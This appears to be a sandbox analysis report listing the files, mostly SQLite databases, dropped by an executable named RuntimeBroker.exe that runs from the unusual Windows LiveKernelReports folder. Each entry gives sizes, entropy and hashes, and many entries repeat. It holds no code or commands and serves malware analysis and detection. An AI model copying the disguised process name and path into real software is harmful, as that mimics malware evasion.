                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):25
                                                                                  Entropy (8bit):4.403856189774723
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:I/TTTk:I/TTTk
                                                                                  MD5:0C13A95A8E1409EAF6352ED26CC5DB12
                                                                                  SHA1:128EF32AF5594128E9AC7C859526563B7352C3B6
                                                                                  SHA-256:F5AAE7A030AD00E0D5050DB15C6BFDCCAEBD362F470041BA8E28F6F9ED3D480F
                                                                                  SHA-512:F51D7A0707E3C164279BBA68CC316D13BFA41995E0166A16455D235D7CF1F932D42A24FE88F674547E212757B9E521F1B1E7D5472360D2E6F942586EE31B2A04
                                                                                  Malicious:false
                                                                                  Preview:mUOHwXXtl8xh7ZyFEaLVklVvA
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
